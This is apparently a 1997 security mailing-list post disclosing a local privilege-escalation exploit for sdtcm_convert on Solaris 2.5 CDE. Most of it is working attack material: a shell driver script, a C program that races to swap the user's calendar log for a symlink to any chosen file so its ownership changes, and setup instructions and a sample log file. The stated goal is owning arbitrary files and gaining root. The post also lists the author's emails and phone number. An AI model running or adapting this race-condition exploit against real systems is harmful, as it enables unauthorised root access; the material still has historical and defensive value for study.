Sun Feb 23 10:36:58 EET 1997 Romania "Exploit for sdtcm_convert - Solaris 2.5" I send you an e-mail about a bug and an exploit for sdtcm_convert. (sdtcm_convert allows you to become owner of any file or directory from the system - and gain root access ) First, there was some problems with my uuencoded exploit (some damaged it on the route...) so i'll resend you the files for exploit. Second, Casper Dick send me:

Is this the bug fixed in the Sun patches:

103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version) 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)

or is it a new one?

Casper

I cant found this patches to verify if that fix the problem i have found or not. Anyway you have an exploit ! (execute 'thefist' and wait) Cristian Schipor - Computer Science Faculty - Bucharest - Romania Email: skipo@math.pub.ro skipo@sundy.cs.pub.ro skipo@ns.ima.ro Phone: (401) 410.60.88 ------------------------- file thefirst ------------------------------------ /bin/echo "orange.c -> orange" gcc -o orange orange.c /usr/ucb/whoami > wh read USER < ./wh #watching for callog file if it isnt will stop if ! test -f /var/spool/calendar/callog.$USER; then /bin/echo "I cant found callog file. Please read README and create it" exit; fi /bin/echo "what's the target ???" read TARGET /bin/echo /bin/chmod 000 /var/spool/calendar/callog.$USER >lemon /bin/echo /usr/dt/bin/sdtcm_convert $USER >>lemon /bin/chmod 700 ./lemon ./orange $TARGET $USER ------------------------- end -------------------------- ------------------------ file orange.c --------------------------- #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #define path "/var/spool/calendar/callog." void main(int argc, char *argv[]) { int pid,filedes[2]; FILE *f; struct stat info; long i; char target[128],shift[128]; strcpy(target,argv[1]); strcpy(shift,path); strcat(shift,argv[2]); if(pipe(filedes)) { perror("cant crate pipe\n"); exit(0); } if(pid=fork()==0) { for(i=0;i<30000000;i++); unlink(shift); symlink(target,shift); write(filedes[1],"y\n",sizeof("y\n")); } else { close(0); dup(filedes[0]); system("lemon"); stat(target,&info); if(info.st_uid==getuid()) printf("COLL I did IT !!!\n"); } } ------------------------ end ---------------------------- ------------------------ file README ---------------------- *How to make a simple callog file* If you dont have a /var/spool/calendar/callog.YOU edit callog.example, replace 'skipo' with your user name and 'sundy.cs.pub.ro' with your machine name (try first the short name, example: sundy and if you'll have troubleshotings try the long name, example sundy.cs.pub.ro). After that copy the new callog file in /var/spool/calendar/callog.YOUR_USER_NAME, run once sdtcm_convert with your user name (example sdtcm_convert skipo) and wait for corrections. Now you are ready to run the exploit. Another way is to run calendar tool from CDE. ------------------------- end ------------------------------- ------------------------ file callog.example ------------------------ Version: 4 **** start of log on Fri Dec 6 14:07:43 1996 **** (calendarattributes ("-//XAPIA/CSA/CALATTR//NONSGML Access List//EN","10:access_list","world:2") ("-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN","5:string","skipo@sundy.cs.pub.ro") ("-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN","6:user","skipo@sundy.cs.pub.ro") ("-//XAPIA/CSA/CALATTR//NONSGML Character Set//EN","5:string","C.ISO-8859-1") ("-//XAPIA/CSA/CALATTR//NONSGML Date Created//EN","7:date_time","19961206T120743Z") ("-//XAPIA/CSA/CALATTR//NONSGML Product Identifier//EN","5:string","-//DT//NONSGML Calendar Product Version 1//EN") ("-//XAPIA/CSA/CALATTR//NONSGML Version//EN","5:string","-//XAPIA/CSA/VERSION1/NONSGML CSA Version 1//EN") ) -------------------------- end --------------------------------